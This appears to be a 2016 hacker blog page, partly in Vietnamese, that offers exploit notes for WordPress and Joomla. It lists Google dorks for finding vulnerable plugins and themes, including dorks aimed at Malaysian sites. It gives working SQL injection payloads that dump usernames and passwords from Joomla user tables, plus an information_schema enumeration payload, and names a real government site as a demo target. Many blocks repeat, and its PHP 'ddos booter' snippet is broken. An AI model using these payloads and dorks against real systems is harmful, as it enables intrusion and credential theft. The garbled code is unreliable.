News Exploier Vulnerability reports, 0days, remote exploits, local exploits, security articles, tutorials and more.
Wednesday, July 6, 2016
// ver test ddos bootes by member of team VHS
<?php
// ver test ddos bootes by member of team VHS
// get content txt online
$txt = file_get_contents("http://example.com/", 0, $ctx);
$convert = explode("\n", $txt); //create array separate by new line
// ver test ddos bootes by member of team VHS
// get content txt online
$txt = file_get_contents("http://example.com/", 0, $ctx);
$convert = explode("\n", $txt); //create array separate by new line
for ($i=0;$i<count($convert);$i++)
{
echo "<frameset cols='25%,50%,25%'>"
echo "<frame src="frame_a.htm">"$convert[$i].', '; //write value by index
echo "</frameset>"
}
//get
?>
{
echo "<frameset cols='25%,50%,25%'>"
echo "<frame src="frame_a.htm">"$convert[$i].', '; //write value by index
echo "</frameset>"
}
//get
?>
dork wordpress
inurl:/wordpress/wp-comments-post.php
inurl:/wp-content/plugins/lazy-seo/lazyseo.php
inurl:/wordpress/wp-content/plugins/complete-gallery-manager
inurl:/wp-admin/admin-ajax.php
inurl:/wp-content/plugins/spicy-blogroll-ajax.php
inurl:/wp-content/plugins/proplayer/playlist-controller.php
inurl:wp-content/plugins/wp-filemanager/
inurl:/wp-content/plugins/lazy-seo/lazyseo.php
inurl:/wordpress/wp-content/plugins/complete-gallery-manager
inurl:/wp-admin/admin-ajax.php
inurl:/wp-content/plugins/spicy-blogroll-ajax.php
inurl:/wp-content/plugins/proplayer/playlist-controller.php
inurl:wp-content/plugins/wp-filemanager/
------------------------------------------------
WordPress thecotton Themes Remote File Upload Vulnerability
Dork: inurl:/wp-content/themes/thecotton_v114/
Dork: inurl:/wp-content/themes/thecotton_v114/
WordPress Sixtees Shell Upload
Dork: inurl:"wp-content/themes/sixtees"
Dork: inurl:"wp-content/themes/sixtees"
WordPress WP-Password Plugin XSS Vulnerability
Dork: inurl:"/wp-content/plugins/wp-password/login.php"
Dork: inurl:"/wp-content/plugins/wp-password/login.php"
Wordpress dzs-videogallery plugin Cross site scripting Vulnerability
Dork: inurl:/wp-content/plugins/dzs-videogallery
Dork: inurl:/wp-content/plugins/dzs-videogallery
Wordpress Plugin Better WP Security multiple vulnerability
Dork: inurl:wp-content/plugins/better-wp-security/backups
Dork: inurl:wp-content/plugins/better-wp-security/backups
WordPress Dandelion Theme Shell Upload
Dork: inurl:/wp-content/themes/dandelion/
Dork: inurl:/wp-content/themes/dandelion/
-----------------------------------------------
index/wp-content/plugins/Enigma2.php?boarddir=
mygallery/myfunctions/mygallerybrowser.php?myPath=
plugins/wp-table/js/wptable-button.phpp?wpPATH=
plugins/wordtube/wordtube-button.php?wpPATH=
plugins/myflash/myflash-button.php?wpPATH=
plugins/BackUp/Archive.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=
plugins/sniplets/modules/syntax_highlight.php?libpath=
mygallery/myfunctions/mygallerybrowser.php?myPath=
plugins/wp-table/js/wptable-button.phpp?wpPATH=
plugins/wordtube/wordtube-button.php?wpPATH=
plugins/myflash/myflash-button.php?wpPATH=
plugins/BackUp/Archive.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=
plugins/sniplets/modules/syntax_highlight.php?libpath=
------------------------------------------------
"inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php"
/wp-content/plugins/easy-comment-uploads/upload-form.php
Index of /wp-content/plugins/easy-comment-uploads
/wp-content/plugins/easy-comment-uploads/upload-form.php
Index of /wp-content/plugins/easy-comment-uploads
file log của cPanel
Các file log của cPanel được lưu tại thư mục /usr/local/cpanel/logs/, gồm có các file chính sau:
access_log: log truy cập của cPanel và WHM.
error_log: log các lỗi của cPanel và WHM.
login_log: log các đăng nhập cPanel và WHM.
access_log: log truy cập của cPanel và WHM.
error_log: log các lỗi của cPanel và WHM.
login_log: log các đăng nhập cPanel và WHM.
Ngoài ra cPanel còn lưu log hệ thống tại thư mục /var/log/, gòm có
bandwidth: log lưu lượng băng thông sử dụng của server.
chkservd.log: log hệ thống theo dõi các dịch vụ trên server.
clamav: log của hệ thống quét virus clamav.
cpupdate: log tác vụ nâng cấp của cPanel.
exim_mainlog: log gửi/nhận thư của hệ thống mail exim.
exim_rejectlog: log các kết nối bị từ chối của exim.
exim_paniclog: log các lỗi của exim.
maillog: log các đăng nhập và kết nối gửi/nhận thư của các dịch vụ mail (pop3/imap).
xferlog: log các kết nối qua FTP.
bandwidth: log lưu lượng băng thông sử dụng của server.
chkservd.log: log hệ thống theo dõi các dịch vụ trên server.
clamav: log của hệ thống quét virus clamav.
cpupdate: log tác vụ nâng cấp của cPanel.
exim_mainlog: log gửi/nhận thư của hệ thống mail exim.
exim_rejectlog: log các kết nối bị từ chối của exim.
exim_paniclog: log các lỗi của exim.
maillog: log các đăng nhập và kết nối gửi/nhận thư của các dịch vụ mail (pop3/imap).
xferlog: log các kết nối qua FTP.
Ngoài ra, log của các tài khoản được lưu trữ trong thư mục /usr/local/cpanel/domlogs/ và log của Apache được lưu tại /usr/local/apache/logs/c lỗi của exim.
maillog: log các đăng nhập và kết nối gửi/nhận thư của các dịch vụ mail (pop3/imap).
xferlog: log các kết nối qua FTP.
maillog: log các đăng nhập và kết nối gửi/nhận thư của các dịch vụ mail (pop3/imap).
xferlog: log các kết nối qua FTP.
Ngoài ra, log của các tài khoản được lưu trữ trong thư mục /usr/local/cpanel/domlogs/ và log của Apache được lưu tại /usr/local/apache/logs/
Joomla Com_simcategories SQL Injection Vulnerability
#######################################################################
# Exploit Title: Joomla Com_simcategories SQL Injection Vulnerability
# Author: GhostVN
# Date :30/06/2013
# Google dork: inurl:index.php?option=com_simcategories
#######################################################################
# Exploitation: index.php?option=com_simcategories&view=simprovider&id=1[SQLI]
# Exploit Title: Joomla Com_simcategories SQL Injection Vulnerability
# Author: GhostVN
# Date :30/06/2013
# Google dork: inurl:index.php?option=com_simcategories
#######################################################################
# Exploitation: index.php?option=com_simcategories&view=simprovider&id=1[SQLI]
# SQL Exploit : index.php?option=com_simcategories&view=simprovider&id=-1' UNION SELECT 1,group_concat(username,0x7c,password),3,4,5,6,7 from jos_users-- -
SQL Injection bypass show all database
SQL Injection bypass show all (database,table_name,columns)
(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.schemata)where (0x00) in (@x:=concat(@x,0x3c62723e,schema_name))))x)
Query get all table + column
concat(0x3c666f6e7420636f6c6f723d7265642073697a653d353e436865636b6564206279204e42543c2f666f6e743e,0x3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d353e44622056657273696f6e203a20,version(),0x3c62723e44622055736572203a20,user(),0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2231223e3c74686561643e3c74723e3c74683e44617461626173653c2f74683e3c74683e5461626c653c2f74683e3c74683e436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(select%20(@x)%20from%20(select%20(@x:=0x00),(select%20(0)%20from%20(information_schema.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20and%20(0x00)%20in%20(@x:=concat(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x))
(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.schemata)where (0x00) in (@x:=concat(@x,0x3c62723e,schema_name))))x)
Query get all table + column
concat(0x3c666f6e7420636f6c6f723d7265642073697a653d353e436865636b6564206279204e42543c2f666f6e743e,0x3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d353e44622056657273696f6e203a20,version(),0x3c62723e44622055736572203a20,user(),0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2231223e3c74686561643e3c74723e3c74683e44617461626173653c2f74683e3c74683e5461626c653c2f74683e3c74683e436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(select%20(@x)%20from%20(select%20(@x:=0x00),(select%20(0)%20from%20(information_schema.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20and%20(0x00)%20in%20(@x:=concat(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x))
Joomla component com_youtubegallery - SQL Injection
Exploit Title: Joomla component com_youtubegallery - SQL Injection
vulnerability
# Google Dork: inurl:index.php?option=com_youtubegallery
# Site POF: http://server/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1'&videoid=ETMVUuFbToQ&tmpl=component&TB_iframe=true&height=500&width=700
vulnerability
# Google Dork: inurl:index.php?option=com_youtubegallery
# Site POF: http://server/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1'&videoid=ETMVUuFbToQ&tmpl=component&TB_iframe=true&height=500&width=700
Dork SQL-injection For Malaysia:
Dork SQL-injection For Malaysia:
inurl:detail.php?ID= site:my
inurl:preview.php?id= site:my
inurl:pages.php?id= site:my
inurl:download.php?id=
site:my
inurl:read.php?id= site:my
inurl:news.php?id= site:my
inurl:newsDetail.php?id=
site:my
inurl:Pageid= site:my
inurl:show.php?id= site:my
inurl:gallery.php?id= site:my
inurl:product.php?id= site:my
inurl:viewphoto.php?id=
site:my
inurl:material.php?id=
site:my
newsDetail.php?id= site:my
pages.php?id= site:my
view.php?id= site:my
theme.php?id= site:my
channel_id= site:my
newscat.php?id= site:my
main.php?id= site:my
inurl:detail.php?ID= site:my
inurl:preview.php?id= site:my
inurl:pages.php?id= site:my
inurl:download.php?id=
site:my
inurl:read.php?id= site:my
inurl:news.php?id= site:my
inurl:newsDetail.php?id=
site:my
inurl:Pageid= site:my
inurl:show.php?id= site:my
inurl:gallery.php?id= site:my
inurl:product.php?id= site:my
inurl:viewphoto.php?id=
site:my
inurl:material.php?id=
site:my
newsDetail.php?id= site:my
pages.php?id= site:my
view.php?id= site:my
theme.php?id= site:my
channel_id= site:my
newscat.php?id= site:my
main.php?id= site:my
code trai tim mouse
trai tim mouse:<script language="javascript" type="text/javascript"src="http://htmlfreecodes.com/userdata/heart.js"></script>
exploit com_tag joomla
Dork
inurl:index.php?option=com_tag
Demo :
http://www.udc.gov.bb/index.php?option=c...&Itemid=18
Thay : index.php?option=com_tag&view=alltags&Itemid=18
Thành : index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component
inurl:index.php?option=com_tag
Demo :
http://www.udc.gov.bb/index.php?option=c...&Itemid=18
Thay : index.php?option=com_tag&view=alltags&Itemid=18
Thành : index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component
Subscribe to:
Posts (Atom)